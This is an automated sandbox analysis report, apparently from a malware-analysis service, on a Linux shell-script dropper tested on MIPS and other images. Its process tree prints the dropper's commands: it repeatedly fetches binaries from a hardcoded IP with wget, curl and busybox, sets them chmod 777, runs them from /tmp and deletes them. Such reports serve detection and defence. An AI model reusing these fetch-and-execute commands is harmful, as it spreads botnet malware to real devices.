Analysis
-
max time kernel
68s -
max time network
71s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 01:37
Static task
static1
Behavioral task
behavioral1
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh
-
Size
10KB
-
MD5
c956e213cb8e0cd5b63267ab840c5dae
-
SHA1
c9c0189ae5a4b6a84cf8c69090e33e6cb8974836
-
SHA256
478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d
-
SHA512
903a8b0408d84cff6c5404beab29ca6b31d19c2f9cca4fce2d34ad6a66e57f53b049639da591e42a4587431c4ed65408d48533fac69dc8d799d48e89680297bd
-
SSDEEP
192:VLdU4cGZNPeGN6Gi9oMIiOtU4cUZNXeGN6Gym:NdU4cz9oMIiMU4cPm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 883 chmod 949 chmod 973 chmod 865 chmod 895 chmod 937 chmod 961 chmod 871 chmod 901 chmod 919 chmod 751 chmod 859 chmod 931 chmod 955 chmod 844 chmod 759 chmod 850 chmod 979 chmod 745 chmod 907 chmod 925 chmod 985 chmod 889 chmod 877 chmod 913 chmod 943 chmod 967 chmod 793 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 746 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 752 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 760 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 795 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 845 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 851 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 860 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 866 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 872 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 878 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 884 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 890 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 896 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 902 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 908 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA 914 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug 920 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 926 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P 932 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t 938 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu 944 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe 950 aht8qi13vR83cufA19JeM2QdZqklsVQxUe /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 956 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs 962 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz 968 93SohCRyB65qsR9PHr0olpVOMBCDET7daz /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm 974 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg 980 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO 986 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz curl File opened for modification /tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO curl File opened for modification /tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3 curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm curl File opened for modification /tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA curl File opened for modification /tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t curl File opened for modification /tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1 curl File opened for modification /tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P curl File opened for modification /tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9 curl File opened for modification /tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg curl File opened for modification /tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu curl
Processes
-
/tmp/478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh/tmp/478abb0b9204c38ac69d393af6856e148dc2bf803ddc7907625ae1ddda47e35d.sh1⤵PID:713
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:718
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:744
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:750
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:756
-
-
/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:763
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:765
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:788
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:798
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:843
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:847
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:849
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:853
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:855
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:864
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:870
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:876
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:882
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:886
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:888
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:890
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:891
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:894
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:900
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:904
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:906
-
-
/bin/chmodchmod 777 anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU9./anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm anQO72Rx7mnbNjTvfTJj7v6QryaF01rDU92⤵PID:909
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:912
-
-
/bin/chmodchmod 777 gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA./gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm gJvFhbPh4pITj1QlghqKwl1AebydDCvLTA2⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:918
-
-
/bin/chmodchmod 777 kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug./kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm kNryejdYnMt9dvjFmPu5Mmu855ZDaqVVug2⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:924
-
-
/bin/chmodchmod 777 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy3./6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm 6rbJZc73nF3wOEMy9d8kBjN0Svj2wuquy32⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:930
-
-
/bin/chmodchmod 777 A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P./A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm A5hn3g4g35x1lAcof5qcUepOjYnE6gIq0P2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:936
-
-
/bin/chmodchmod 777 oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t./oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm oY5tLhFtL550dIaF7pKucuwSqgQumqnz1t2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:942
-
-
/bin/chmodchmod 777 Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu./Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm Z1iF9Ikv27t3J9bHyI7dma6NMY4RonQxuu2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:948
-
-
